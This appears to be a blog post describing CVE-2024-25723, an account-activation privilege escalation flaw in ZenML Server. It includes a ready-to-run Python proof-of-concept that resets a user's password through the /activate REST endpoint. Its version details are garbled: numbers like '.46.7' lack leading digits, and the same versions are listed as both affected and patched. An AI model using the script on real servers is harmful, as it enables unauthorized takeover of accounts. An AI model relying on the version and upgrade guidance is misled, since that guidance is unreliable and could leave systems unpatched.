A critical vulnerability has been identified in the ZenML machine learning package for Python that allows remote privilege escalation. This vulnerability has been assigned the CVE identifier CVE-2024-25723 and affects ZenML Server versions before .46.7. This blog post will explore the details of this vulnerability, provide code snippets of the affected software, and discuss the patched versions provided by the ZenML team.
Vulnerability Details
The vulnerability exists in the ZenML Server, which is a component of the ZenML machine learning package for Python. Specifically, the remote privilege escalation issue affects the /api/v1/users/{user_name_or_id}/activate REST API endpoint. This endpoint allows access to users based on a valid username and a new password in the request body. Consequently, an attacker can exploit this vulnerability to gain unauthorized access and privileges on the targeted server.
Exploit Details
The exploit involves sending a specially-crafted HTTP request to the vulnerable REST API endpoint. By providing a valid username and a new password in the request body, an attacker can activate a new user account with elevated privileges, effectively granting the attacker administrative access to the ZenML Server.
Here is a code snippet demonstrating the exploit
import requests
# Replace the following placeholders with the target server's information
target_server = "http://[target-server-ip]:[port]";
user_name = "valid_username"
new_password = "new_password"
# Construct the API endpoint URL
api_endpoint = f"{target_server}/api/v1/users/{user_name}/activate"
# Craft the JSON payload with the new password
json_payload = {
"password": new_password
}
# Send a POST request to the endpoint with the JSON payload
response = requests.post(api_endpoint, json=json_payload)
# Check if the request is successful
if response.status_code == 201:
print("Success! User account activated with elevated privileges.")
else:
print("Failed to activate the user account.")
The following ZenML Server versions are affected by this vulnerability
* Versions before .46.7
* .44.4
* .43.1
* .42.2
Patched Versions
To address this security issue, the ZenML team has released patched versions of the software. Users are advised to upgrade their ZenML Server installations to one of the following versions:
* .46.7
* .44.4
* .43.1
* .42.2
To upgrade your Python installation and apply the patches, use the following command
pip install zenml-server==version_number
Replace version_number with the appropriate patched version number listed above.
Original References
For more details about this vulnerability and the associated patches, please refer to the following references:
1. CVE-2024-25723 - MITRE CVE Dictionary Entry
2. ZenML GitHub Repository - Security Advisory
3. ZenML Documentation - Security Guide
Conclusion
Users of the ZenML machine learning package for Python are advised to upgrade their installations to the patched versions to address the remote privilege escalation vulnerability identified as CVE-2024-25723. By applying the patches, users can secure their ZenML Server deployments and protect their systems from unauthorized access and exploitation. Stay vigilant and ensure the security of your applications and infrastructure by regularly reviewing and applying security updates.
Timeline
Published on: 02/27/2024 15:15:07 UTC
Last modified on: 08/01/2024 13:47:49 UTC